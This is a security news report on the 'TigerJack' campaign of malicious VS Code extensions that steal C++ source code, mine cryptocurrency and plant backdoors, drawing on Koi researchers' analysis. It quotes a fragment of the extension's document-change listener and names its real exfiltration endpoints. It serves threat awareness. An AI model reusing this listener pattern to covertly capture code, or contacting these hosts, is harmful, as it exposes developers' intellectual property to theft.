A sophisticated threat actor known as TigerJack has systematically infiltrated developer marketplaces with at least 11 malicious Visual Studio Code extensions, targeting thousands of unsuspecting developers worldwide.
Operating under multiple publisher identities including ab-498, 498, and 498-00, this cybercriminal has deployed a comprehensive attack arsenal designed to steal source code, mine cryptocurrency, and establish remote backdoors for complete system control.
The scale of this operation is staggering. Two of TigerJack’s most successful extensions, “C++ Playground” and “HTTP Format,” infected over 17,000 developers before Microsoft quietly removed them from their marketplace. However, the threat persists beyond the initial takedown.
.webp "TigerJack Hacks Infiltrated Developer Marketplaces with 11 Malicious VS Code Extensions 2")
TigerJack’s git repository (Source – Koi)
These malicious extensions remain fully operational in the OpenVSX marketplace, which powers popular IDE alternatives like Cursor and Windsurf, continuing their covert operations months after their removal from Microsoft’s platform.
What makes this campaign particularly insidious is the sophisticated deception employed by the threat actor.
The extensions deliver exactly the functionality they promise while simultaneously conducting malicious activities in the background.
Developers installing these tools receive genuine utility – code compilation, error highlighting, and formatting capabilities – creating the perfect cover for the underlying malware operations.
Koi analysts identified the malware’s sophisticated multi-layered approach during their comprehensive investigation.
The threat actor employs a trojan horse strategy, initially publishing benign extensions to build trust and accumulate positive reviews before deploying malicious updates.
This methodical approach allowed TigerJack to establish credibility within the developer community while positioning for large-scale intellectual property theft.
Even as security researchers investigated this operation, TigerJack demonstrated remarkable persistence by launching a coordinated republication campaign.
On September 17, 2025, five new extensions appeared simultaneously under the “498-00” publisher account, including a repackaged version of the original C++ Playground malware.
.webp "TigerJack Hacks Infiltrated Developer Marketplaces with 11 Malicious VS Code Extensions 4")
This systematic approach reveals an operation designed for longevity rather than opportunistic attacks.
Code Theft Mechanism and Technical Implementation
The technical sophistication of TigerJack’s code exfiltration mechanism exemplifies advanced malware engineering.
The “C++ Playground” extension activates automatically through its onStartupFinished trigger and establishes a document change listener that monitors every C++ file within the developer’s workspace.
The malware employs surgical precision, targeting only C++ files to avoid detection from developers working in other programming languages.
Every keystroke triggers the malicious function after a carefully calibrated 500-millisecond delay – optimized to capture code in real-time while avoiding performance degradation that might alert users.
The complete source code gets packaged into JSON payloads and transmitted to multiple exfiltration endpoints, including “ab498.pythonanywhere.com” and “api.codex.jaagrav.in.”
The payload structure reveals the comprehensive scope of data theft, capturing not only the complete C++ source code but also processed versions and simulated input data.
P.workspace.onDidChangeTextDocument((i) => {
if (i.document &&
i.document.languageId == "cpp" &&
i.document?.uri.scheme == "file") {
(j?.document.uri.toString() != mt.myfile &&
(mt.myfile != i.document.uri.toString()) &&
(Bt(i), (mt.myfile = i.document.uri.toString())))
}
})The exfiltrated data includes breakthrough algorithms, competitive advantages, thesis projects, and proprietary code – representing months or years of intellectual property theft.
This mechanism operates invisibly alongside the extension’s legitimate functionality, making detection extremely challenging for individual developers who observe only the promised features while their most valuable digital assets are systematically stolen.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
